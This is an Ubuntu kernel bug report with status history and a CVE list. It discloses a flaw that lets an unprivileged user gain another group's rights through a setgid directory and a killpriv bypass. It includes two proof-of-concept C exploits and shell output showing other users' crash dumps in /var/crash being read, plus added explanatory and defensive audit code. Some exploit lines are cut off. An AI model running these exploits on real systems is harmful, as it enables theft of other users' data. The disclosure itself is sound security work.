other users' coredumps can be read via setgid directory and killpriv bypass
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
linux (Ubuntu) | Fix Released | Medium | Tyler Hicks |
Trusty | Fix Released | Medium | Tyler Hicks |
Xenial | Fix Released | Medium | Tyler Hicks |
Bionic | Fix Released | Medium | Tyler Hicks |
Cosmic | Won't Fix | Medium | Tyler Hicks |
Bug Description
Note: I am both sending this bug report to <email address hidden> and filing it in
the Ubuntu bugtracker because I can't tell whether this counts as a kernel bug
or as an Ubuntu bug. You may wish to talk to each other to determine the best
place to fix this.
I noticed halfdog's old writeup at https:/ , describing essentially the
following behavior in combination with a trick for then writing to the
resulting file without triggering the killpriv logic:
=============
user@debian:
user@debian:
#include <fcntl.h>
int main(void) { open("dir/file", O_RDONLY|O_CREAT, 02755); }
user@debian:
user@debian:
user@debian:
-rwxr-sr-x 1 user root 0 Jun 25 22:03 dir/file
=============
Two patches for this were proposed on LKML back then:
"[PATCH 1/2] fs: Check f_cred instead of current's creds in
should_
https:/
"[PATCH 2/2] fs: Harden against open(..., O_CREAT, 02777) in a setgid directory"
https:/
However, as far as I can tell, neither of them actually landed.
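As an added illustration (not code from this report, from halfdog's writeup or from the kernel), the following C model shows what group and mode a newly created non-directory inode receives in a setgid directory, first as the kernel behaved when this report was filed and then with the upstream fix referenced later on this page (commit 0fa3ecd87848c9c93c2c828ef4c3a8ca36ce46c7). The `creator_t` struct, the function names and the sample principals are assumptions made for this example; the real kernel helpers are `inode_init_owner()`, `in_group_p()` and `capable_wrt_inode_uidgid()`.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>

/* Who is creating the file. Constructed for this illustration. */
typedef struct {
    uid_t uid;
    gid_t fsgid;          /* creator's filesystem gid (primary group) */
    const gid_t *groups;  /* supplementary groups */
    size_t ngroups;
    bool cap_fsetid;      /* holds CAP_FSETID in the directory's user namespace */
} creator_t;

/* Model of the kernel's in_group_p(): is gid one of the creator's groups? */
static bool in_group(const creator_t *c, gid_t gid) {
    if (c->fsgid == gid)
        return true;
    for (size_t i = 0; i < c->ngroups; i++)
        if (c->groups[i] == gid)
            return true;
    return false;
}

/* Group a new inode created under dir receives; same before and after the fix:
 * a setgid directory hands its own group to every new entry. */
gid_t derive_new_file_gid(mode_t dir_mode, gid_t dir_gid, const creator_t *c) {
    return (dir_mode & S_ISGID) ? dir_gid : c->fsgid;
}

/* Mode bits a new non-directory inode receives. `requested` is the mode passed
 * to open()/mknod() with the umask already applied (assumption). With
 * hardened == false this models inode_init_owner() before the fix: in a setgid
 * directory the group is inherited and a requested S_ISGID is kept as asked,
 * even though chmod() would have refused it for a non-member. With
 * hardened == true it models the upstream fix: S_ISGID on a group-executable
 * file is dropped unless the creator is a member of the inherited group or
 * holds CAP_FSETID. S_ISGID without S_IXGRP (mandatory-locking flag) is left alone. */
mode_t derive_new_file_mode(mode_t dir_mode, gid_t dir_gid, mode_t requested,
                            const creator_t *c, bool hardened) {
    mode_t mode = requested & 07777;
    if (!(dir_mode & S_ISGID))
        return mode;   /* no inheritance: S_ISGID refers to the creator's own group */
    if (hardened &&
        (mode & (S_ISGID | S_IXGRP)) == (S_ISGID | S_IXGRP) &&
        !in_group(c, dir_gid) && !c->cap_fsetid)
        mode &= ~S_ISGID;
    return mode;
}

/* Sample principals (constructed): uid 1000 with and without membership in group 0. */
static const gid_t user_groups[]  = { 1000, 24 };
static const gid_t admin_groups[] = { 1000, 0 };
const creator_t plain_user  = { 1000, 1000, user_groups,  2, false };
const creator_t root_member = { 1000, 1000, admin_groups, 2, false };
const creator_t cap_holder  = { 1000, 1000, user_groups,  2, true  };

int main(void) {
    /* The scenario from the report: a setgid directory with group root (gid 0),
     * and an unprivileged user requesting a setgid, group-executable file. */
    const mode_t dir_mode = 02775;
    const gid_t  dir_gid  = 0;
    const mode_t want     = 02755;
    printf("pre-fix : mode %04o gid %u\n",
           (unsigned)derive_new_file_mode(dir_mode, dir_gid, want, &plain_user, false),
           (unsigned)derive_new_file_gid(dir_mode, dir_gid, &plain_user));
    printf("post-fix: mode %04o gid %u\n",
           (unsigned)derive_new_file_mode(dir_mode, dir_gid, want, &plain_user, true),
           (unsigned)derive_new_file_gid(dir_mode, dir_gid, &plain_user));
    return 0;
}
```

The pre-fix line reproduces the `-rwxr-sr-x user root` entry in the listing above: the group is inherited from the directory and the setgid bit survives. The post-fix line keeps the inherited group but yields `0755`, which is the same outcome chmod() would have enforced all along.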
You can also bypass the killpriv logic with fallocate() and mmap() -
fallocate() permits resizing the file without triggering killpriv, and
mmap() permits writing without triggering killpriv (the mmap part is mentioned
at https:/ ):
=============
user@debian:
user@debian:
#define _GNU_SOURCE
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <string.h>
int main(void) {
int src_fd = open("/usr/bin/id", O_RDONLY);
if (src_fd == -1)
err(1, "open 2");
struct stat src_stat;
if (fstat(src_fd, &src_stat))
err(1, "fstat");
int src_len = src_stat.st_size;
char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
if (src_mapping == MAP_FAILED)
err(1, "mmap 2");
int fd = open("dir/file", O_RDWR|
if (fd == -1)
err(1, "open");
if (fallocate(fd, 0, 0, src_len))
err(1, "fallocate");
char *mapping = mmap(NULL, src_len, PROT_READ|
if (mapping == MAP_FAILED)
err(1, "mmap");
memcpy(mapping, src_mapping, src_len);
munmap(mapping, src_len);
close(fd);
close(src_fd);
execl(
err(1, "execl");
}
user@debian:
user@debian:
uid=1000(user) gid=1000(user) egid=0(root)
groups=
=============
sys_copy_
supported filesystems, but I haven't tested that one so far.
On Ubuntu 18.04 (bionic), /var/crash is mode 03777, group "whoopsie", and
contains group-readable crashdumps in some custom format, so you can use this
issue to steal other users' crashdumps:
=============
user@ubuntu-
total 296
-rw-r----- 1 user whoopsie 16527 Jun 25 22:27 _usr_bin_
-rw-r----- 1 root whoopsie 50706 Jun 25 21:51 _usr_bin_id.0.crash
-rw-r----- 1 user whoopsie 51842 Jun 25 21:42 _usr_bin_
-rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_
-rw-r----- 1 root whoopsie 18765 Jun 26 00:42 _usr_bin_
user@ubuntu-
cat: /var/crash/
user@ubuntu-
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <string.h>
int main(int argc, char **argv) {
if (argc != 2) {
printf("usage: ./fallocate <file_to_read>");
return 1;
}
int src_fd = open("/bin/cat", O_RDONLY);
if (src_fd == -1)
err(1, "open 2");
struct stat src_stat;
if (fstat(src_fd, &src_stat))
err(1, "fstat");
int src_len = src_stat.st_size;
char *src_mapping = mmap(NULL, src_len, PROT_READ, MAP_PRIVATE, src_fd, 0);
if (src_mapping == MAP_FAILED)
err(1, "mmap 2");
unlink(
int fd = open("/
if (fd == -1)
err(1, "open");
if (fallocate(fd, 0, 0, src_len))
err(1, "fallocate");
char *mapping = mmap(NULL, src_len, PROT_READ|
if (mapping == MAP_FAILED)
err(1, "mmap");
memcpy(mapping, src_mapping, src_len);
munmap(mapping, src_len);
close(fd);
execl(
err(1, "execl");
}
user@ubuntu-
user@ubuntu-
user@ubuntu-
total 384
-rwxr-sr-x 1 user whoopsie 35064 Jul 3 19:22 privileged_cat
-rw-r----- 1 user whoopsie 16527 Jun 25 22:27 _usr_bin_
-rw-r----- 1 root whoopsie 50706 Jun 25 21:51 _usr_bin_id.0.crash
-rw-r--r-- 1 user whoopsie 50706 Jul 3 19:22 _usr_bin_
-rw-r----- 1 user whoopsie 51842 Jun 25 21:42 _usr_bin_
-rw-r----- 1 user whoopsie 152095 Jun 25 21:43 _usr_bin_
-rw-r----- 1 root whoopsie 18765 Jun 26 00:42 _usr_bin_
user@ubuntu-
user@ubuntu-
user@ubuntu-
user@ubuntu-
user@ubuntu-
root_crash_
=============
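Added defender-side example, not part of the report: a small audit that checks a directory such as /var/crash for the artifact this technique leaves behind, namely a setgid, group-executable file owned by a non-root uid who is not a member of the file's group, sitting in a setgid directory that other users can write to. The names `is_suspicious_setgid_file()`, `check_entry()`, `audit_setgid_dir()` and `uid_in_group()` are chosen here; the conditions mirror the listing above (`-rwxr-sr-x user whoopsie` inside a mode 03777 directory owned by group whoopsie). It is a point-in-time check that complements, rather than replaces, the kernel fix.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <grp.h>
#include <pwd.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Pure check over two stat results. True when: dir is setgid and group- or
 * world-writable; file is a non-directory with S_ISGID and S_IXGRP set; the
 * owner is not root; and the owner is not a member of the file's group
 * (owner_in_group is supplied by the caller so this stays testable offline). */
bool is_suspicious_setgid_file(const struct stat *dir, const struct stat *file,
                               bool owner_in_group) {
    if (!S_ISDIR(dir->st_mode) || !(dir->st_mode & S_ISGID))
        return false;
    if (!(dir->st_mode & (S_IWGRP | S_IWOTH)))
        return false;
    if (S_ISDIR(file->st_mode))
        return false;
    if ((file->st_mode & (S_ISGID | S_IXGRP)) != (S_ISGID | S_IXGRP))
        return false;
    if (file->st_uid == 0)
        return false;
    return !owner_in_group;
}

/* Convenience wrapper that builds the two stat structs from raw values
 * (constructed input; used for self-tests and quick experiments). */
bool check_entry(mode_t dir_mode, mode_t file_mode, uid_t file_uid, bool owner_in_group) {
    struct stat d, f;
    memset(&d, 0, sizeof d);
    memset(&f, 0, sizeof f);
    d.st_mode = dir_mode;
    f.st_mode = file_mode;
    f.st_uid  = file_uid;
    return is_suspicious_setgid_file(&d, &f, owner_in_group);
}

/* Is uid a member of gid according to the passwd/group databases? */
static bool uid_in_group(uid_t uid, gid_t gid) {
    struct passwd *pw = getpwuid(uid);
    if (!pw)
        return false;               /* unknown owner: treat as non-member */
    if (pw->pw_gid == gid)
        return true;
    int n = 0;
    getgrouplist(pw->pw_name, pw->pw_gid, NULL, &n);   /* size query */
    if (n <= 0)
        return false;
    gid_t *groups = calloc((size_t)n, sizeof *groups);
    if (!groups)
        return false;
    bool member = false;
    if (getgrouplist(pw->pw_name, pw->pw_gid, groups, &n) != -1)
        for (int i = 0; i < n; i++)
            if (groups[i] == gid) { member = true; break; }
    free(groups);
    return member;
}

/* Scan one directory (non-recursive), print matches, return their count,
 * or -1 if the directory cannot be read. */
int audit_setgid_dir(const char *path) {
    struct stat dir_st;
    if (stat(path, &dir_st) != 0)
        return -1;
    DIR *d = opendir(path);
    if (!d)
        return -1;
    int hits = 0;
    struct dirent *de;
    while ((de = readdir(d)) != NULL) {
        if (strcmp(de->d_name, ".") == 0 || strcmp(de->d_name, "..") == 0)
            continue;
        struct stat st;
        if (fstatat(dirfd(d), de->d_name, &st, AT_SYMLINK_NOFOLLOW) != 0)
            continue;
        bool member = uid_in_group(st.st_uid, st.st_gid);
        if (is_suspicious_setgid_file(&dir_st, &st, member)) {
            printf("%s/%s: mode %04o uid %u gid %u: setgid executable owned by a non-member\n",
                   path, de->d_name, (unsigned)(st.st_mode & 07777),
                   (unsigned)st.st_uid, (unsigned)st.st_gid);
            hits++;
        }
    }
    closedir(d);
    return hits;
}

int main(int argc, char **argv) {
    const char *path = argc > 1 ? argv[1] : "/var/crash";
    int n = audit_setgid_dir(path);
    if (n < 0) { perror(path); return 2; }
    printf("%d suspicious entries in %s\n", n, path);
    return n > 0 ? 1 : 0;
}
```

Run it as `./audit /var/crash` (or any other setgid, group-writable spool directory); a non-zero exit status means at least one entry matched. Because `getgrouplist()` consults NSS, the membership lookup reflects the current group database, not the one at creation time.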
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.
CVE References
- 2016-10208
- 2017-11472
- 2017-11473
- 2017-14991
- 2017-15649
- 2017-16526
- 2017-16527
- 2017-16529
- 2017-16531
- 2017-16532
- 2017-16533
- 2017-16535
- 2017-16536
- 2017-16537
- 2017-16538
- 2017-16643
- 2017-16644
- 2017-16645
- 2017-16650
- 2017-16911
- 2017-16912
- 2017-16913
- 2017-16914
- 2017-17558
- 2017-18255
- 2017-18270
- 2017-2583
- 2017-2584
- 2017-2671
- 2017-5549
- 2017-5715
- 2017-5897
- 2017-6345
- 2017-6348
- 2017-7518
- 2017-7645
- 2017-8831
- 2017-9984
- 2018-1000204
- 2018-10021
- 2018-10087
- 2018-10124
- 2018-10323
- 2018-10675
- 2018-10840
- 2018-10877
- 2018-10881
- 2018-1092
- 2018-1093
- 2018-10940
- 2018-1108
- 2018-11412
- 2018-11506
- 2018-12232
- 2018-12233
- 2018-12904
- 2018-13094
- 2018-13405
- 2018-13406
no longer affects: whoopsie (Ubuntu)
no longer affects: whoopsie (Ubuntu Trusty)
no longer affects: whoopsie (Ubuntu Xenial)
no longer affects: whoopsie (Ubuntu Bionic)
no longer affects: whoopsie (Ubuntu Cosmic)
Changed in linux (Ubuntu Trusty): status: In Progress → Fix Committed
Changed in linux (Ubuntu Xenial): status: In Progress → Fix Committed
Changed in linux (Ubuntu Bionic): status: In Progress → Fix Committed
Changed in linux (Ubuntu Cosmic): status: In Progress → Won't Fix
Changed in linux (Ubuntu): status: In Progress → Fix Released
This is now fixed upstream in Linus' tree: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0fa3ecd87848c9c93c2c828ef4c3a8ca36ce46c7
Note that this fix does not have a CC stable marker.